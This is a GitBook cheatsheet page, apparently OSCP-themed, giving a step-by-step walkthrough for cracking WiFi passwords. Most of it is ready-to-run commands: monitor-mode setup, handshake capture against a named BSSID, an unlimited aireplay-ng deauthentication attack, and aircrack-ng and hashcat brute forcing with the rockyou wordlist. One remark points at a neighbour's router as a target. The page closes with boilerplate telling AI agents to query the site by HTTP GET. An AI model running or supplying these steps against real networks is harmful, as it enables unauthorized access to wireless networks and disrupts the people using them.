# Wifi Cracking **WLAN Adapter:** * ALFA Networks AWUS036ACH Dual Adaptor {% embed url="" %} **INSTALL DRIVER & ACTIVATE MONITOR MODE:** {% embed url="" %} {% embed url="" %} CHECK FOR DEVICE: ``` $iwconfig $lsusb ``` UPDATE: ``` $sudo apt update $sudo apt upgrade -y $sudo apt dist-upgrade -y $sudo reboot now $sudo apt update ``` INSTALL DRIVERS: ``` $sudo apt install realtek-rtl88xxau-dkms $sudo apt install dkms $git clone https://github.com/aircrack-ng/rtl8812au $cd rtl8812au $sudo make $sudo make install ``` UNPLUG DEVICE RECONNECT TO VM: ``` $lsusb $iwconfig ``` TEST: ``` $sudo airmon-ng start wlan0 $sudo wifite --wpa --kill ``` ## **Cracking WiFi WPA2 Handshake** {% embed url="" %} See interfaces: ``` ip addr iwconfig ``` kill processes: ``` sudo airmon-ng check kill ``` Start monitor mode: ``` sudo airmon-ng start wlan0 ``` Verify that monitor mode is used: ``` sudo airmon-ng ``` You could also use iwconfig to check that interface is in monitor mode: ``` iwconfig ``` Get the AP's MAC address and channel: ``` sudo airodump-ng wlan0 ``` AP-MAC & channel: ``` - BSSID/MAC: - CHANNEL: ``` SHOW ONLY SINGLE MAC: ``` $ sudo airodump-ng wlan0 -d A2:B5:3C:C1:F5:FC ``` 1st Window:\ Make sure you replace the channel number and bssid with your own \ Replace hack1 with your file name like capture1 or something ``` sudo airodump-ng -w WIFI1 -c 10 --bssid A2:B5:3C:C1:F5:FC wlan0mon ``` 2nd Window - deauth attack: \ Make sure you replace the bssid with your own ``` sudo aireplay-ng --deauth 0 -a A2:B5:3C:C1:F5:FC wlan0 ``` Use Wireshark to open hack file: ``` $ wireshark hack1-01.cap Filter Wireshark messages for EAPOL eapol ``` Stop monitor mode: ``` sudo airmon-ng stop wlan0 ``` Crack file with Rock you or another wordlist\ Make sure you have rockyou in text format (unzip file on Kali)\ Replace hack1-01.cap with your file name ``` aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ``` ## Brute force WiFi WPA2 with GPU Primarily you'll only have luck cracking WPS if the router is quite old and hasnt had any firmware updates (which most people dont update their router firmware so thats a good chance). Most, if not all, newer routers have brute force protections against WPS, typically in the form of timeouts and locks (as you are seeing on your neighbors router). When attacking WPS nowadays you need to use time modifiers (i dont know if wifite has that option, but bully and reaver do). Typically, in my experience from a couple years ago, you had to put at minimum 30 seconds between each attempt, but im not sure what the standard would be nowadays for that. {% embed url="" %} **WIFITE:** ``` sudo wifite --wpa --kill Crlt C (choose NUM) c (WPA handshake) ls cd hs ls sudo /usr/share/hashcat-utils/cap2hccapx.bin handshake_KitkatHouse_F8-CA-59-A0-79-3F_2022-12-29T22-22-06.cap wpa2.hccapx ls ``` **HASHCAT:** \ Install CUDA Toolkit: ``` cd downloads cd hashcat-6.2.6 hashcat.exe -I hashcat.exe -m 22000 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp-exodussec.gitbook.io/cheatsheet55/script-kiddies/wifi-cracking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.